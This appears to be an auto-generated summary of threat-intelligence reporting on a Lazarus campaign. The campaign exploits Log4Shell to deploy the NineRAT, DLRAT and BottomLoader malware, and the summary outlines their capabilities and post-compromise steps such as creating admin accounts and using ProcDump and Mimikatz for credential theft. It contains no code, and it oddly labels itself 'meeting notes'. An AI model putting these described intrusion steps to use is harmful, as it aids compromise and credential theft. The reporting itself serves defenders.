December 11, 2023 at 04:29PM
Lazarus, the North Korean hacking group, is utilizing CVE-2021-44228 to launch new malware families written in DLang as part of “Operation Blacksmith.” This campaign, targeting various industries, demonstrates the group’s evolving tactics. The new malware includes the remote access trojans NineRAT and DLRAT, as well as the downloader BottomLoader. Lazarus uses Log4Shell to infiltrate and deploy malicious tools, with NineRAT capable of executing various commands and potentially sharing data with other threat groups.
From the meeting notes, the key takeaways are:
1. Lazarus, a notorious North Korean hacking group, is exploiting the Log4j vulnerability (CVE-2021-44228), known as “Log4Shell,” to deploy three newly developed malware families written in DLang, which includes two remote access trojans (NineRAT and DLRAT) and a malware downloader named BottomLoader.
2. These malware tools represent a notable shift in Lazarus’ tactics and tools, with the campaign named “Operation Blacksmith” targeting manufacturing, agricultural, and physical security companies worldwide.
3. NineRAT uses the Telegram API for command and control communication, supporting various commands for information gathering, file exfiltration, and system manipulation, while DLRAT collects system information and can introduce additional payloads on an infected system.
4. BottomLoader is a malware downloader that fetches and executes payloads from a hardcoded URL using PowerShell while also establishing persistence and offering file exfiltration capabilities.
5. The Log4Shell attacks observed by Cisco Talos involve leveraging the critical remote code execution flaw in Log4j, targeting publicly facing VMWare Horizon servers, and enabling attackers to perform remote code execution.
6. Lazarus sets up a proxy tool for persistent access, runs reconnaissance commands, creates new admin accounts, and deploys credential-stealing tools like ProcDump and MimiKatz following the compromise, and then deploys the NineRAT in the second phase of the attack.
7. There is a possibility that Lazarus feeds other APT groups or clusters under its umbrella with data collected by NineRAT, as it performs system “re-fingerprinting” in some cases, implying that it could be performing system IDing and data collection for multiple actors.
These clear takeaways provide an overview of the meeting notes and the significant points discussed during the meeting.